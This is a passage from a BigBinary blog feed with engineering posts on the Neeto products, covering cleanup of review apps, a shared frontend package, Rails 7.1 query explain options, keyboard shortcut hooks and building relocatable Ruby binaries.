github_client = Octokit::Client.new(access_token:)  open_pr_numbers = github_client    .pull_requests(github_repository.name, state: :open)    .pluck(:number)  github_repository.project.apps.review.find_each do |app|    next if open_pr_numbers.include?(app.pr_number)    apps.append(app)  endend</code></pre><p>This would populate the list of apps to delete in <code>apps</code> variable, it can bedisplayed, verified and then we can destroy them individually:</p><pre><code class="language-ruby">apps.map do |app|  Apps::DestroyService.new(app).process!end</code></pre><p>The other takeaway here is to have proper recovery mechanisms in place.Human/system errors are possible; we should be prepared when it happens.</p><p><a href="https://neeto.com/neetodeploy">NeetoDeploy</a> is still not production-ready.However, if you want to give NeetoDeploy a try, then tweet to us at<a href="https://twitter.com/neetodeploy">@neetoDeploy</a> or send us an email at<code>invite@neeto.com</code>.</p>]]></content>
    </entry><entry>
       <title><![CDATA[Challenges faced while building Neeto commons frontend]]></title>
       <author><name>Amaljith K</name></author>
      <link href="https://www.bigbinary.com/blog/neeto-commons-frontend"/>
      <updated>2023-07-11T12:00:00+00:00</updated>
      <id>https://www.bigbinary.com/blog/neeto-commons-frontend</id>
      <content type="html"><![CDATA[<p>At <a href="https://www.neeto.com/">neeto</a>, we are building<a href="https://blog.neeto.com/p/neeto-products-and-people">a lot of products</a> tosimplify how we work. Many of these products share similar features, such as a404 page, team member invitations, a sidebar, app switcher, Slack integration,etc. For consistency in both UI and functionality, these common businessrequirements must remain uniform across all Neeto products.</p><p>To bring a new Neeto product to market, we used to copy the whole repo of analready existing product and then we used to delete the previous product-specificcode from the new repo. This ensured that the visual design, applicationinitialization logic, code quality enforcement rules, etc. are the same in allNeeto products. However, during active development, we noticed three bigproblems with the consistency of Neeto products.</p><ul><li>Different teams implemented the same business requirements in different ways,causing products to go out of sync.</li><li>Bringing an update to the common functionality required manual changes toevery repository.</li><li>Some teams made quick and dirty changes to the common copied logic to fixcoding inconveniences.</li></ul><p>To address these challenges, we needed a way to share the common code. Simplycopying the common code to each repository was not scalable. We built a ruby gemnamed <code>neeto-commons-backend</code> and an NPM package named <code>neeto-commons-frontend</code>to hold all our common code.</p><p>The implementation of the <code>neeto-commons-backend</code> gem was relatively easy, butthe implementation of the frontend package, <code>neeto-commons-frontend</code>, posedseveral challenges. Let's discuss some of the challenges we faced while building<code>neeto-commons-frontend</code>.</p><h3>public or private?</h3><p>Both <code>neeto-commons-backend</code> and <code>neeto-commons-frontend</code> contained a lot ofbusiness logic specific to neeto. So having these two repos as &quot;private&quot; inGitHub was an easy call.</p><p>When it comes to using <code>neeto-commons-backend</code> gem, we can directly use the gemfrom GitHub if we configure the access tokens correctly in the hostapplications. Recently, we have deployed a private gem server to host our gems.However, for <code>neeto-commons-frontend</code>, things aren't that straightforward. If wedecide to serve the package directly from Github private repository, we willhave the following problems:</p><ul><li><p>Apart from <code>neeto-commons-frontend</code>, we have multiple other frontend packages.To use <code>neeto-commons-frontend</code> as a dependency in them, we will need tohardcode the GitHub access token in their <code>package.json</code> file. But, <code>package.json</code>is considered to be a public file. So it is not safe to add any secret keys ortokens to it. If we unknowingly publish any of those packages to npm, ourtokens would leak to the public.</p></li><li><p>We cannot directly use the ES6 source code in the host application. We need totranspile the JS files before serving. If we were serving<code>neeto-commons-frontend</code> directly from GitHub, we are limited to theseoptions:</p><ul><li>Add a <code>post_install</code> hook to the package: <code>post_install</code> command is said tobe executed at the time of running <code>yarn install</code> or <code>yarn add</code> on the hostproject. We can add a command to transpile <code>neeto-commons-frontend</code> fromthat hook. But the <code>post_install</code> hook isn't guaranteed to always run. So itisn't a reliable strategy.</li><li>Another option is to maintain a copy of transpiled JS output in our GitHubrepo by using pre-commit and prepush hooks. But, keeping generated code inversion control isn't a good practice. Moreover, can't trust pre-commit andprepush hooks because they can be skipped or can fail to run.</li></ul></li></ul><p>So, we decided to bundle <code>neeto-commons-frontend</code>'s JS code using<a href="https://rollupjs.org">rollup</a> and release it to NPM as a public package. Eventhough the source code will remain private in GitHub, it would make our bundleavailable to the public. Anyone can do<code>yarn add @bigbinary/neeto-commons-frontend</code> to obtain our JS bundle.</p><p>However, minified JavaScript bundles are nearly impossible to comprehend. Hence,we think it's reasonable to make them public. We anyway need the JavaScriptbundle to be served publicly in the browsers while loading Neeto products. Wecannot keep the frontend JS code completely private.</p><h3>Release management</h3><p>In the initial stages of building <code>neeto-commons-frontend</code>, we used to split alarge feature into several small sub-issues. So, we raise many small PRs toaccomplish a single feature. For this reason, we didn't want to publish a newversion of <code>neeto-commons-frontend</code> after merging every PR. We needed manualcontrol over the publishing process.</p><p>Also, whenever we do decide to publish a new version, we wish to have anautomated mechanism to generate release notes explaining the changes from theprevious revision.</p><p>To satisfy these requirements, we decided to use<a href="https://docs.github.com/en/repositories/releasing-projects-on-github/managing-releases-in-a-repository">GitHub releases</a>.It offered the following benefits:</p><ul><li>GitHub can automatically generate release notes using the titles of the mergedPRs since the last release.</li><li>The generated release notes will contain a link to visualize code diff betweenthe current and previous releases.</li><li>We can run a GitHub action to automatically publish the package to npm when wecreate a new release.</li></ul><p>We successfully followed that process for a long time. Later on,<code>neeto-commons-frontend</code> became stable. Now, each PR is comprehensive andrequires an NPM publish. So, we changed our GitHub action to create a GitHubrelease and publish the package to NPM on every PR merge.</p><h3>common initializers</h3><p>The <code>neeto-commons-backend</code> gem consists of various code components necessaryfor initializing the Rails backend, such as configuring CORS, establishingcache, and more.</p><p>Likewise, in the frontend, certain initialization tasks must be completed beforethe React components can begin rendering. These tasks include configuring Axiosinterceptors and headers, initializing Honeybadger and Mixpanel integrations,setting up translation resources, and more.</p><p>Just like <code>neeto-commons-backend</code>, we wanted <code>neeto-commons-frontend</code> to performall these frontend initialization tasks on its own. But it wasn't asstraightforward as we anticipated. Here are some challenges we faced whileinitializing the host application from <code>neeto-commons-frontend</code>:</p><h4>Modifying axios instance of the host application</h4><p>Axios lets us customize its default instance at runtime by adding customheaders. With that, all network requests from our app will have those headersset implicitly. Also, Axios lets us register request and responseinterceptors to view and edit requests and responses before it is sent orreceived.</p><p>All Neeto products use this feature to set the Auth token and CSRF token in theheaders. They also register interceptors for different use cases like showingtoaster messages, handling authorization errors, etc.</p><p>Since this logic is the same in all products, we decided to move it to<code>neeto-commons-frontend</code>. Our requirement was to customize the host project'sAxios instance from <code>neeto-commons-frontend</code>, without having to write any codefrom the host project.</p><p>For better clarity, let us assume that we are trying to initialize Axios in<a href="https://www.neeto.com/neetocal">NeetoCal</a> using <code>neeto-commons-frontend</code>.</p><p>To use Axios in <code>neeto-commons-frontend</code>, just like any other JS project, weneed to add <code>axios</code> to its package.json. But if we were to add <code>axios</code> as adependency, rollup will pull out the source code from <code>axios</code> and include it inthe package's published bundle.</p><p>Similarly, since NeetoCal has both <code>neeto-commons-frontend</code> and <code>axios</code> as itsdependencies, <a href="https://webpack.js.org">webpack</a> will pull out both of theirsource code and add it to the JS bundle of NeetoCal. It will cause NeetoCal's JSbundle to have two copies of <code>axios</code> code. One from NeetoCal's dependencies andanother one from <code>neeto-commons-frontend</code>'s bundle.</p><p>When a browser loads NeetoCal's bundle, both those codes will get initializedand we will have two separate instances of Axios. Any customizations done from<code>neeto-commons-frontend</code> will be applicable only to its own Axios instance. Wewon't be able to touch the NeetoCal's Axios instance from<code>neeto-commons-frontend</code>.</p><p>As a solution for this, we defined <code>axios</code> as a <code>peerDependency</code> in<code>neeto-commons-frontend</code>'s package.json. Since we use<a href="https://www.npmjs.com/package/rollup-plugin-peer-deps-external">rollup-plugin-peer-deps-external</a>plugin, rollup will consider <code>axios</code> as an external dependency while bundling.That means rollup will not pull code from <code>axios</code> and add it to<code>neeto-commons-frontend</code> bundle. Instead, it will keep the<code>import axios from &quot;axios&quot;</code> statement as it is and assume that NeetoCal willhave this dependency installed and available at runtime.</p><p>Since both NeetoCal and <code>neeto-commons-frontend</code> are now importing Axios fromthe same source, both of them will share the same instance. Any modificationsdone from <code>neeto-commons-frontend</code> will reflect on the Axios instance used inthe project as well.</p><h4>Placement of initialization logic</h4><p>We were unsure of where to initialize the application from. We first triedinitializing the app from <code>useEffect</code> hook of the top-most component, <code>App.jsx</code>.</p><p>But, as per React's life cycle, the app will run one complete render cycle ofall nested components before <code>useEffect</code> gets called. Also, a parent component's<code>useEffect</code> will be executed only after all the <code>useEffect</code>s registered in thechild components are completed.</p><p>This won't work for us due to the following reasons:</p><ul><li>We were using <code>i18next.t()</code> function in several constants to render localetranslations. For the translations to be available, we need to initialize<code>i18next</code> before using it. But since constants get initialized immediatelyafter the bundle is loaded, all those calls will result in<code>Translation not found</code> errors.</li><li>Some nested components were performing API calls from their <code>useEffect</code> hooks.Since initialization is not completed by that time, the requests will fail dueto missing authentication keys.</li></ul><p>To avoid the problem with the delay in <code>useEffect</code> hook, we could have invokedthe initialization step directly from the rendering code of <code>App.jsx</code>, byinlining it with the function definition. But, it is not a good practice tointroduce side effects from outside <code>useEffect</code> hooks. So, we didn't go withthat.</p><p>After some trials and errors, we finally decided to place the initializationfunction call in <code>app/javascript/packs/application.js</code>. It is the file that getsexecuted before React gets mounted. So our app will be fully initialized beforeit starts to render.</p><h3>utility functions</h3><p>We created <code>neeto-commons-frontend</code> by copying common code from all neetoproducts to it. We identified these categories of common code: applicationinitialization logic, react components and hooks, and general utility functions.</p><p>When copying utility functions, we realized that we could implement a new set ofutility functions to minimize boilerplate code in all Neeto products. There area lot of operations done using array functions like <code>map</code>, <code>filter</code>, <code>find</code>,etc. We were using arrow functions to compare nested properties, which was themost common boilerplate.</p><p>We decided to introduce a function <code>matches</code>, which checks whether the givenpattern is partially equal to the given object. It works like this: the pattern<code>{ name: &quot;Oliver&quot; }</code> matches the object <code>{ name: &quot;Oliver&quot;, phone: 000000 }</code>because the object contains the key <code>name</code> and its value is the same in both thepattern and the object.</p><p>With this function as the foundation, we built several array functions like<code>findBy</code>, <code>removeBy</code>, <code>replaceBy</code>, etc. All these functions check for theelement that <code>match</code>es the given pattern from an array and performs the requiredoperation on that element.</p><p>We also took inspiration from Ramda and implemented currying for such utilityfunctions. This shortened the JS code and made it more declarative.</p><pre><code class="language-js">// beforesetUsers(users =&gt;  users.map(user =&gt; (user.address.pincode === 600213 ? newUser : user)));// aftersetUsers(replaceBy({ address: { pincode: 600213 } }, newUser));</code></pre><pre><code class="language-js">// beforeconst defaultOrg = organizations.find(({ users }) =&gt;  users.includes(DEFAULT_USER));// afterconst defaultOrg = findBy({ users: includes(DEFAULT_USER) }, organizations);</code></pre><p>You can read our blog<a href="https://www.bigbinary.com/blog/extending-pure-utility-functions-of-ramda">Extending pure utility functions of Ramda.js</a>to learn more about how we built these utility functions.</p><h3>dependency management</h3><p>The utility functions exported by <code>neeto-commons-frontend</code> are like an extensionto Ramda. They can be used outside Neeto web applications as well. Severalfrontend packages and even React Native team can use these utility functions.</p><p>Since we import multiple packages as external modules (to use the host project'smodules, for example, Axios), we cannot export <code>neeto-commons-frontend</code> as asingle bundle. This will force the host applications to have those packages intheir dependencies.</p><p>To avoid this problem, we decided to create separate bundles for each category.We now have four independent bundles: <code>pure</code>, <code>utils</code>, <code>react-utils</code>, and<code>initializers</code>.</p><p><code>pure</code> bundle contains all the pure functions we have discussed earlier. Itneeds only Ramda as an external dependency. <code>utils</code> bundle encompasses generalutility functions which has dependencies on packages other than Ramda. Anexample for that is <code>copyToClipboard</code> function. It shows a toaster message ifcopying is successful. So it depends on <code>@bigbinary/neetoui</code> package as well.<code>react-utils</code> and <code>initializers</code> contains several neeto-specific externaldependencies. They are designed to work only on Neeto web apps.</p><h3>IDE support &amp; types</h3><p>Initially, all frontend packages at BigBinary were serving UMD bundles. They arecompatible with every environment. So there is not much headache of having topublish multiple bundles for different environments.</p><p>But UMD bundles do not assist IDEs well. That is, IDE can't provide auto-import,autocompletion, and type support if we distribute UMD packages alone. IDEs evengive false positive errors when importing items from the package since theycan't detect such an export in the bundle.</p><p>The first workaround we tried is to serve ESM or CJS bundles instead of UMD.Both ESM and CJS work well with imports. But imports from the bundle areimplicitly typed as <code>any</code> by the IDE. We won't get any predictions for functionparameters or component props. We were OK with this setup for a few weeks. Thisat least does not give false positive errors.</p><p>But the problem with this setup is that the developer continuously needs torefer to the docs to understand the parameters a function accepts. Thissignificantly degrades the development experience. To avoid this hassle, somedevelopers preferred not to use our functions and instead wrote lengthy vanillaJS code.</p><p>Later, we found a solution to this problem. We added explicit type definitionusing <code>.d.ts</code> files in <code>neeto-commons-frontend</code> package. They contain the typedefinition of all our exports, written in typescript. We won't copy the JSimplementation code to it. It will only contain function declarations.</p><p>Since we were exporting four different bundles, we had to add four different<code>.d.ts</code> files with the same name as the bundle. That is, we have <code>pure.d.ts</code>,<code>utils.d.ts</code>, <code>react-utils.d.ts</code>, and <code>initializers.d.ts</code>. The IDE automaticallypicks up the correct type definition file for the bundle we are importing anduses it to give predictions.</p><p>The introduction of type declaration helped us improve the IDE supportsignificantly. It also allows us to add JSDoc comments and deprecation noticesfor the exported items. Using these, the IDE can show documentation for thefunctions while the developer types.</p><h3>People not knowing the available functions</h3><p>Even though we were exporting tons of functions from <code>neeto-commons-frontend</code>,people were not aware of the existence of many of them. So we found that manywere reinventing the wheel or wasting their time writing the boilerplate.</p><p>As a solution for this, we decided to add some custom ESLint rules to<code>eslint-plugin-neeto</code>, which shows warnings to the user about a possible Ramda or<code>neeto-commons-frontend</code> alternative when we detect a corresponding boilerplatecode.</p><p>You can find the story behind <code>eslint-plugin-neeto</code> and the challenges facedduring its development on another blog here.</p>]]></content>
    </entry><entry>
       <title><![CDATA[Rails 7.1 enables detailed query plan analysis with options in ActiveRecord::Relation#explain]]></title>
       <author><name>Vishnu M</name></author>
      <link href="https://www.bigbinary.com/blog/rails-7-1-adds-options-to-activerecord-relation-explain"/>
      <updated>2023-07-04T12:00:00+00:00</updated>
      <id>https://www.bigbinary.com/blog/rails-7-1-adds-options-to-activerecord-relation-explain</id>
      <content type="html"><![CDATA[<p>In Rails 7.1, an enhancement has been introduced to the<a href="https://apidock.com/rails/ActiveRecord/Relation/explain"><code>ActiveRecord::Relation#explain</code></a>method. This enhancement allows us to obtain detailed query plan analysis byspecifying options for the <code>explain</code> output.</p><h3>Understanding the EXPLAIN method</h3><p>Before diving into the new options available in Rails 7.1, let's quickly recapthe purpose and usage of the <code>explain</code> method in Active Record. The <code>explain</code>method is used to retrieve the execution plan of an SQL query chosen by thedatabase optimizer. It provides insight into how the database intends to executethe query, including the sequence of operations, indexes used, and estimatedcosts.</p><p>By analyzing the query plan, we can identify potential performance bottlenecks,optimize database schema design, and fine-tune queries for better efficiency.However, prior to Rails 7.1, the level of detail available in the explain outputwas limited.</p><h3>Detailed query plan analysis with options</h3><p>In Rails 7.1, the <code>explain</code> method accepts options, enabling us to customize theoutput and obtain a more detailed query plan analysis. It's important to notethat these options are the same ones that are already available in native SQL.Options may vary depending on the database used. In this blog post, we willfocus on examples using PostgreSQL. Let us take a look at some of the availableoptions.</p><h4>ANALYZE</h4><p>The <code>analyze</code> option causes the statement to be actually executed, not onlyplanned. Then actual run time statistics are added to the display, including thetotal elapsed time expended within each plan node and the total number of rowsit actually returned.</p><pre><code class="language-ruby">Service.where('age &gt; ?', 25).joins(:user).explain(:analyze)</code></pre><pre><code class="language-sql">EXPLAIN (ANALYZE) SELECT &quot;services&quot;.* FROM &quot;services&quot; INNER JOIN &quot;users&quot; ON &quot;users&quot;.&quot;id&quot; = &quot;services&quot;.&quot;user_id&quot; WHERE (age &gt; 25)                          QUERY PLAN-------------------------------------------------------------------------------------------------------------------------------------------------------- Hash Join  (cost=15.50..29.42 rows=103 width=232) (actual time=0.015..0.017 rows=0 loops=1)   Hash Cond: (services.user_id = users.id)   -&gt;  Seq Scan on services  (cost=0.00..13.10 rows=310 width=232) (actual time=0.012..0.012 rows=0 loops=1)   -&gt;  Hash  (cost=14.12..14.12 rows=110 width=8) (never executed)         -&gt;  Seq Scan on users  (cost=0.00..14.12 rows=110 width=8) (never executed)               Filter: (age &gt; 25) Planning Time: 0.915 ms Execution Time: 0.472 ms</code></pre><h4>VERBOSE</h4><p>The <code>verbose</code> option provides a more detailed output by including additionalinformation about each step in the execution plan. This includes statistics,cost estimates, and other relevant details.</p><pre><code class="language-ruby">Service.where('age &gt; ?', 25).joins(:user).explain(:verbose)</code></pre><pre><code class="language-sql">EXPLAIN (VERBOSE) SELECT &quot;services&quot;.* FROM &quot;services&quot; INNER JOIN &quot;users&quot; ON &quot;users&quot;.&quot;id&quot; = &quot;services&quot;.&quot;user_id&quot; WHERE (age &gt; 25)                          QUERY PLAN-------------------------------------------------------------------------------------------------------------------------------------------------------- Hash Join  (cost=15.50..29.42 rows=103 width=232)   Output: services.id, services.user_id, services.provider, services.uid, services.access_token, services.access_token_secret, services.refresh_token, services.expires_at, services.auth, services.created_at, services.updated_at   Inner Unique: true   Hash Cond: (services.user_id = users.id)   -&gt;  Seq Scan on public.services  (cost=0.00..13.10 rows=310 width=232)         Output: services.id, services.user_id, services.provider, services.uid, services.access_token, services.access_token_secret, services.refresh_token, services.expires_at, services.auth, services.created_at, services.updated_at   -&gt;  Hash  (cost=14.12..14.12 rows=110 width=8)         Output: users.id         -&gt;  Seq Scan on public.users  (cost=0.00..14.12 rows=110 width=8)               Output: users.id               Filter: (users.age &gt; 25)(11 rows)</code></pre><p>For more options available in PostgreSQL's EXPLAIN command, you can refer to the<a href="https://www.postgresql.org/docs/current/sql-explain.html">official documentation</a>.</p><p>Please check out this <a href="https://github.com/rails/rails/pull/47043">pull request</a>for more details.</p>]]></content>
    </entry><entry>
       <title><![CDATA[How We standardized keyboard shortcuts in neeto]]></title>
       <author><name>Adil Ismail</name></author>
      <link href="https://www.bigbinary.com/blog/how-we-standardized-keyboard-shortcuts"/>
      <updated>2023-06-27T12:00:00+00:00</updated>
      <id>https://www.bigbinary.com/blog/how-we-standardized-keyboard-shortcuts</id>
      <content type="html"><![CDATA[<p>We are building <a href="https://neeto.com">Neeto</a>, which is a collection of software.Keyboard shortcuts are a vital feature in any product that aims to improve userexperience. This blog will discuss how we standardized keyboard shortcuts acrossall Neeto products.</p><h2>The need for standardization</h2><p>Before we delve into how we've standardized keyboard shortcuts, it's importantto understand why we felt the need to do so. With multiple products under theNeeto ecosystem, each product team was implementing keyboard shortcutsfunctionality in their own way. This led to several problems:</p><ul><li><p>Cross-platform browser problems</p><p>Some products use <code>react-hotkeys</code> and some use <code>react-hotkeys-hook</code> forkeyboard shortcuts. And some create their custom hooks to handle keyboardshortcuts. However, the issue with all three approaches is that developers maymiss adding alternative hotkeys for operating systems that are different fromtheir development machine.</p><p>Furthermore, OS-based key translation behavior is inconsistent. For instance,one product may use the combination <code>option + s</code> for Mac and <code>alt + s</code> forWindows, while another product may use <code>option + s</code> for Mac and <code>ctrl + s</code> forWindows. Such inconsistencies degrade the user experience when users switchbetween operating systems.</p></li><li><p>Difference in UI for listing all shortcuts</p><p>Each product displayed shortcuts differently. Some used <code>react-hotkeys</code>built-in feature, while others created separate pages, modals, or tooltips toshow hotkeys. We wanted consistent behavior across all products in Neeto.</p></li><li><p>Difficulty finding and modifying registered hotkeys in the codebase</p><p>There was no standard convention on how/where to keep hotkey data. Someproducts have created a file to store all the hotkeys &amp; related info, and somehave their own conventions. When a developer is transferred from one product toanother, they find it hard to adapt to the new conventions over there. Wewanted consistency in code structuring as well for all products in Neeto.</p></li></ul><p>To fix all these problems, we decided to bring in some code conventions andextract the common code to an npm package so that it can be reused in allproducts consistently.</p><h2>Components and hooks created for standardization</h2><p>We introduced a custom hook to run a specified function when the associatedhotkey is fired. We also built a side pane component to display the list of allshortcuts.</p><h3>ShortcutsPane</h3><p>ShortcutsPane is a React component that displays all the keyboard shortcuts inthe product. It belongs to <code>neeto-molecules</code> package to enable code reuse. Userscan open/close the shortcuts pane by clicking on the Keyboard shortcuts icon inthe sidebar or pressing a hotkey <code>shift+/</code>.</p><p>This is how the pane looks:</p><p><img src="https://user-images.githubusercontent.com/29166133/234621934-09a75528-a1e7-4840-9fe9-fd51085a3a3c.png" alt="Pane image"></p><p>This is how the component is integrated into the products:</p><pre><code class="language-jsx">&lt;KeyboardShortcuts.Pane productShortcuts={SHORTCUTS}&gt;</code></pre><p>We include <code>KeyboardShortcuts.Pane</code> in the <code>Main</code> component, which, as per Neetostandards, is the topmost parent component. Here, <code>SHORTCUTS</code> constant containsthe product-specific custom shortcuts. We have set a convention to define it ina file named <code>constants/keyboardShortcuts.js</code>. <code>productShortcuts</code> prop isoptional and it can be omitted if a product doesn't have any custom shortcuts.</p><p>Given below is the sample structure of the <code>keyboardShorcuts.js</code> file.</p><pre><code class="language-js">export const CATEGORY_NAMES = {  messenger: &quot;MESSENGER&quot;,  settings: &quot;SETTINGS&quot;,};export const SHORTCUTS = {  [CATEGORY_NAMES.messenger]: {    addNewLine: {      sequence: &quot;shift+return&quot;,      description: &quot;Add new line&quot;,    },    sendMessage: {      sequence: &quot;return&quot;,      description: &quot;Send message&quot;,    },    addEmoji: {      sequence: &quot;command+option+e&quot;,      description: &quot;Add emoji&quot;,    },    closeConversation: {      sequence: &quot;command+option+y&quot;,      description: &quot;Close conversation&quot;,    },  },  [CATEGORY_NAMES.settings]: {    addPlaceholder: {      sequence: &quot;command+option+t&quot;,      description: &quot;Add placeholder&quot;,    },  },};</code></pre><p>Because of this consistency, the developers moving from one Neeto product toanother Neeto product would find it easy to identify and make changes to the productshortcuts.</p><p>When <code>SHORTCUTS</code> is passed into <code>KeyboardShortcuts.Pane</code>, it will be merged withthe common keyboard shortcuts list. The common list will contain shortcuts likeopen/close pane, close modals, submit form, etc that apply to all products.Developers have to pass the <code>hotkey</code> for MacOs and the component will take careof identifying the user's platform using <code>platform.js</code> and render appropriateplatform-specific keys. For example, <code>option</code> will be converted to <code>alt</code> forWindows users.</p><h3>useHotKeys hook</h3><p>We wanted a hook that combined the features of both <code>react-hotkeys</code> and<code>react-hotkeys-hook</code>. We wanted all the features of <code>react-hotkeys-hook</code> liketheir hook style &amp; easy to use API and the <code>sequential</code> mode of <code>react-hotkeys</code>package. So we went with building our own hook named <code>useHotKeys</code>. We added thehook to the package <code>@bigbinary/neeto-commons-frontend</code>. All our reusable hooks,common utility functions, configs, etc reside in this package. Developers willpass a hotkey, a handler function, and an optional configuration object to thehook.</p><p><code>useHotKeys</code> is built using the popular<a href="https://craig.is/killing/mice">mousetrap.js</a> package. <code>mousetrap.js</code> is a tinylibrary that helps handle keyboard shortcuts in an application.</p><p>Because of the following features of <code>useHotKeys</code>, we can handle most of theshortcut management cases for any application.</p><ul><li>It supports sequential hotkeys. For example, &quot;press s and then r&quot;.</li><li>It can bind simultaneous hotkeys. For exampl,e &quot;press s and at the same timepress r&quot;.</li><li>It can bind single hotkeys eg: <code>return</code>.</li><li>It auto converts a hotkey based on platform eg: <code>command</code> is converted to<code>ctrl</code> on Windows, and the user will only pass the hotkey for macOS.</li><li>It supports <code>enabled</code> config which can be used to enable/disable the hotkey.By default, all hotkeys will be enabled.</li><li>It supports multiple modes of operation as explained below:<ul><li><code>default</code>: On default mode hotkeys won't be fired if the current focus is oninput fields.</li><li><code>scoped</code>: The mode scoped is used to restrict a hotkeys handler to aspecific DOM element eg: forms.</li><li><code>global</code>: global is similar to the default mode. The only difference is thatit will fire even if the user is focused on an input field.</li></ul></li></ul><p>The following is an example of using the default mode. Here, the handler<code>handleCloseConversation</code> will be invoked whenever the user presses the closeconversation hotkey:</p><pre><code class="language-jsx">useHotKeys(MESSENGER_SHORTCUTS.closeConversation.sequence, () =&gt;  setCoversationModalOpen(true));</code></pre><p>We define constants like <code>MESSENGER_SHORTCUTS</code> in the<code>constants/keyboardShortcuts.js</code> file to make it easier to access sequences andpass them to the <code>useHotKeys</code> hook. It would look something like this:</p><pre><code class="language-js">export const MESSENGER_SHORTCUTS = SHORTCUTS[CATEGORY_NAMES.messenger];</code></pre><p>The following is an example of using the scoped mode. When the mode is scoped,<code>useHotKeys</code> will return a React ref that we can attach to the desired element.The handler function will only be invoked when the user presses the hotkey andis focused inside the form, e.g, the input element:</p><pre><code class="language-jsx">const formRef = useHotKeys(  MESSENGER_SHORTCUTS.toggleModal.sequence,  () =&gt; setIsModalOpen(isOpen =&gt; !isOpen),  { mode: &quot;scoped&quot; });return (  &lt;div&gt;    &lt;form ref={formRef}&gt;      &lt;input type=&quot;text&quot; name=&quot;username&quot; /&gt;    &lt;/form&gt;  &lt;/div&gt;);</code></pre><h3>usePaneState hook</h3><p>While rolling out these components to products, we noticed that it would be niceif some pages were styled differently when the pane is open. So, we added ahook, <code>usePaneState</code>, that will tell whether the pane is open or not. Pages canuse this hook to know the current status of the pane &amp; apply styles accordingly.</p><p>Try out any of the <a href="https://neeto.com">neeto</a> products and see the keyboardshortcuts in action for yourself.</p>]]></content>
    </entry><entry>
       <title><![CDATA[Using enable-load-relative flag in building Ruby binaries]]></title>
       <author><name>Vishal Yadav</name></author>
      <link href="https://www.bigbinary.com/blog/use-of-enable-load-relative-flag-in-building-ruby-binaries"/>
      <updated>2023-06-20T12:00:00+00:00</updated>
      <id>https://www.bigbinary.com/blog/use-of-enable-load-relative-flag-in-building-ruby-binaries</id>
      <content type="html"><![CDATA[<p>I'm working on building <a href="https://neeto.com/neetoci">NeetoCI</a>, which is a CI/CDsolution. While building precompiled Ruby binaries, we encountered somechallenges. This blog post explores the problems we faced and how we solvedthem.</p><h2>Pre-compiled Ruby binaries</h2><p>Pre-compiled Ruby binaries are distribution-ready versions of Ruby that includeoptimized features for specific systems. These Ruby binaries save time byeliminating the need to compile Ruby source code manually. Pre-compiled Rubybinaries help users quickly deploy applications that use different versions ofRuby on multiple machines.</p><p><a href="https://rvm.io/">RVM</a> (Ruby Version Manager) is widely used for managing Rubyinstallations on Unix-like systems. RVM provides customized pre-compiled Rubybinaries tailored for various CPU architectures. These binaries offer additionalfeatures like readline support and SSL/TLS support. You can find them at<a href="https://rvm.io/binaries/">RVM binaries</a>.</p><h2>The Need for pre-compiled Ruby Binaries</h2><p><a href="https://www.neeto.com/neetoci">NeetoCI</a> must execute user code in acontainerized environment. A Ruby environment is essential for running Ruby onRails applications. However, relying on the system's Ruby version is impracticalsince it may differ from the user's required version. Although rbenv or rvm canbe used to install the necessary Ruby version, this approach could be slow. Tosave time, we chose to leverage pre-compiled Ruby binaries.</p><p>As a CI/CD system, NeetoCI must ensure that all versions of Ruby that anapplication requires are always available. Hence, we decided to build ourbinaries instead of relying on binaries provided by RVM. Also, this would allowus to do more system-specific optimizations to the Ruby binary at build time.</p><h2>Building pre-compiled Ruby binaries</h2><p>We built a Ruby binary following the<a href="https://github.com/ruby/ruby/blob/master/doc/contributing/building_ruby.md">official documentation</a>. We were able to execute it on our local development machines. But the samebinary ran into an error in our CI/CD environment.</p><p><img src="/blog_images/2023/use-of-enable-load-relative-flag-in-building-ruby-binaries/failing-binary-error-image.png" alt="Bad Interpreter"></p><pre><code class="language-bash">$ bundle config path vendor/bundle./ruby: bad interpreter: No such file or directory</code></pre><p>To debug the issue, we initially focused on <code>$PATH</code>. However, even afterresolving the <code>$PATH</code> issues, the problem persisted. We conducted a thoroughinvestigation to identify the root cause. Unfortunately, not much was written onthe Internet about this error. There was no mention of it in the official<a href="https://github.com/ruby/ruby/blob/master/doc/contributing/building_ruby.md">Ruby documentation</a>.</p><p>As the next step, we decided to download the binary for version 3.2.2 from<a href="https://rvm.io/binaries/">RVM</a>. While examining the configuration file, wenoticed that the following arguments were used with the configure command duringthe Ruby binary build process:</p><pre><code class="language-bash">configure_args=&quot;'--prefix=/usr/share/rvm/rubies/ruby-3.2.2' '--enable-load-relative' '--sysconfdir=/etc' '--disable-install-doc' '--enable-shared'&quot;</code></pre><p>Here are the explanations of the configuration arguments:</p><ol><li><p><code>--prefix=/usr/share/rvm/rubies/ruby-3.2.2</code>: This specifies the directorywhere the Ruby binaries, libraries and other files will be kept after theinstallation is done.</p></li><li><p><code>--enable-load-relative</code>: This specifies that Ruby can load relative pathsfor dynamically linked libraries. It allows the usage of relative pathsinstead of absolute paths when loading shared libraries. This feature can bebeneficial in specific deployment scenarios.</p></li><li><p><code>--sysconfdir=/etc</code>: This argument sets the directory where Ruby's systemconfiguration files will be installed. In this case, it specifies the <code>/etc</code>directory as the location for these files.</p></li><li><p><code>--disable-install-doc</code>: When this option is enabled, the installation ofdocumentation files during the build process is disabled. This can help speedup the build process and save disk space, especially if you do not requirethe documentation files.</p></li><li><p><code>--enable-shared</code>: Enabling this option allows the building of sharedlibraries for Ruby. Shared libraries enable Ruby to dynamically link and loadspecific functionality at runtime, leading to potential performanceimprovements and reduced memory usage.</p></li></ol><p>In simpler terms, when the <code>--enable-load-relative</code> flag is enabled, thecompiled Ruby binary can search for shared libraries in its own directory usingthe <code>$ORIGIN</code> variable.</p><p>When I built the binary on the Docker registry, then the passed <code>--prefix</code> wassomething like <code>/usr/share/neetoci</code>. When the binary is built, then binary had<code>/usr/share/neetoci</code> is hard-coded at various places. When we download thisbinary and use in CI then in the CI environment, Ruby is looking for<code>/user/share/neetoci</code> to load dependencies.</p><p>By enabling <code>--enable-load-relative</code> flag while building the binary Ruby willnot use the hard coded value. Rather Ruby will use <code>$ORIGIN</code> variable and willsearch for the dependencies in the directory mentioned in <code>$ORIGIN</code>.</p><p>This is particularly helpful when the Ruby binary is relocated to a differentdirectory or system. By using relative paths with <code>$ORIGIN</code>, the binary can findits shared libraries regardless of its new location. Without this flag, sharedlibraries are loaded using absolute paths, which can cause issues if the binaryis moved to a different location and cannot locate its shared libraries.</p><p>In our specific use case, where we create and download binaries in separatecontainers, we encountered an error due to the absolute paths. To overcome this,we enabled the <code>--enable-load-relative</code> flag. This allowed the binary to findits shared libraries successfully, and it worked as expected in our CI/CDenvironment.</p><p><img 